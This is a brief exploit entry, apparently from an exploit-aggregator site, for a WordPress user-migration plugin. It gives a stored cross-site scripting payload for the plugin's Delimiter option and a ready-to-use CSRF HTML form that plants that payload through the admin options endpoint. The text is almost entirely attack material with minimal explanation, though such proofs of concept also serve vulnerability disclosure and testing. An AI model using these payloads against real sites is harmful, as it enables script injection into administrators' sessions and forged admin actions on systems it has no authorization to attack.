Share
## https://sploitus.com/exploit?id=WPEX-ID:7915070F-1D9B-43C3-B01E-FEC35F633A4D
Add the following payload in the Delimiter option of the plugin (/wp-admin/tools.php?page=migrate_users&action=options): "><script>alert(/XSS/)</script>

Via a CSRF attack:

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php?page=migrate_users&action=options" method="POST">
      <input type="hidden" name="options[delimiter]" value=',"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="options[limit]" value="10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>